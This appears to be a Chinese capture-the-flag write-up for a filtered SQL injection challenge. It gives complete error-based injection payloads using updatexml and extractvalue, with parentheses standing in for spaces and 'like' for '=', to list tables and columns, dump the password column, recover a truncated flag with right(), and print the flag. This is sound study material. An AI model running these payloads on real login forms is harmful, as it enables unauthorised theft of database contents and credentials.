打开题目,发现这也还是一个SQL注入的题目。难度可能比之前的大,也就加了点过滤吧。
通过测试发现过滤了union,and,等于号,空格
可以使用updatexml或extractvalue报错注入法
查表:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=admin
查列:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=admin
查内容:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=admin
此时只得到了flag的左半部分,可以使用right()得到右半部分
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e),1))%23&password=asdf
拼起来就可以得到flag了(记得去掉重复部分)
flag{21ef294f-3972-4f87-bd09-a5ea22ea3a34}
使用extractvalue报错注入法:
查表:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e))))%23&password=admin
查列:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e))))%23&password=admin
查内容:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))))%23&password=admin
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e))))%23&password=admin
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
